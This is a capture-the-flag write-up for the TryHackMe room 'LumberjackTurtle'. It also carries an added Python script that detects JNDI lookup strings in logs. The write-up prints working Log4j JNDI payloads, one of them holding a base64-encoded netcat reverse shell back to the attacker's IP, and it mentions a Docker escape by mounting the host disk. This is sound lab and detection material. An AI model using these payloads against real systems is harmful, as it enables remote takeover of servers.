THM LumberjackTurtle

IP: 10.10.204.88

Enumeration

Nmap

PORT   STATE SERVICE     VERSION
22/tcp open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6a:a1:2d:13:6c:8f:3a:2d:e3:ed:84:f4:c7:bf:20:32 (RSA)
|   256 1d:ac:5b:d6:7c:0c:7b:5b:d4:fe:e8:fc:a1:6a:df:7a (ECDSA)
|_  256 13:ee:51:78:41:7e:3f:54:3b:9a:24:9b:06:e2:d5:14 (ED25519)
80/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain;charset=UTF-8).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

We see that we have 2 open ports: 80 and 22.

Port 80


Error


Log4j Detection

We will use this as the payload:

 ${jndi:ldap://10.18.0.53:4444}


So we have a Log4j vulnerability here.

Let's try to get a shell.

Shell

${jndi:ldap://$IP:1389/Basic/Command/Base64/cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDEwLjE4LjAuNTMgNDQ0NCAgPi90bXAvZg==}
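For triage on the defending side, lookup strings of the two forms shown above can be pulled out of request logs and split into callback host, port and any embedded command. This is an added example, not part of the original writeup; the log line layout, the `hdr` field and the function names are assumptions, and the sample lines are constructed.

```python
import base64
import re
from urllib.parse import unquote

# Lookup form used on this page: ${jndi:<scheme>://<host>[:<port>][/<path>]}
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)"
    r"(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)
# Path layout of the shell payload above: .../Command/Base64/<base64 of the command>
B64_CMD_RE = re.compile(r"/Command/Base64/(?P<b64>[A-Za-z0-9+/=_-]+)$")

SAMPLE_LOG = [  # constructed lines (hypothetical layout), not captured from the target
    '203.0.113.7 GET / hdr="curl/7.81"',
    '203.0.113.7 GET / hdr="${jndi:ldap://203.0.113.7:4444}"',
    "203.0.113.7 GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%3A1389"
    "%2FBasic%2FCommand%2FBase64%2FaWQ%3D%7D",
]


def find_jndi_lookups(line):
    """Return one finding dict per JNDI lookup string in a log line."""
    findings = []
    # Query strings are logged URL-encoded, so decode before matching.
    for m in JNDI_RE.finditer(unquote(line)):
        finding = {
            "scheme": m["scheme"].lower(),
            "host": m["host"],
            "port": int(m["port"]) if m["port"] else None,
            "command": None,
        }
        cmd = B64_CMD_RE.search(m["path"] or "")
        if cmd:
            b64 = cmd["b64"] + "=" * (-len(cmd["b64"]) % 4)  # restore padding
            try:
                raw = base64.b64decode(b64, altchars=b"-_")
                finding["command"] = raw.decode("utf-8", "replace")
            except ValueError:
                finding["command"] = "<undecodable>"
        findings.append(finding)
    return findings


def scan(lines):
    """Return (line_number, finding) pairs for every lookup found."""
    return [(n, f) for n, line in enumerate(lines, 1) for f in find_jndi_lookups(line)]


if __name__ == "__main__":
    for n, f in scan(SAMPLE_LOG):
        print(n, f)
```

The decoded `command` field shows what the request tried to run, and the host and port give the callback address to look for in egress logs.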


User Flag.

The user flag is found in /opt/.flag1.

Docker escape and privilege.

We will mount /dev/xvda in /tmp.


Fun flag 


Let's try to find the real flag.


And voilà, we got the real root flag.


Thanks for watching.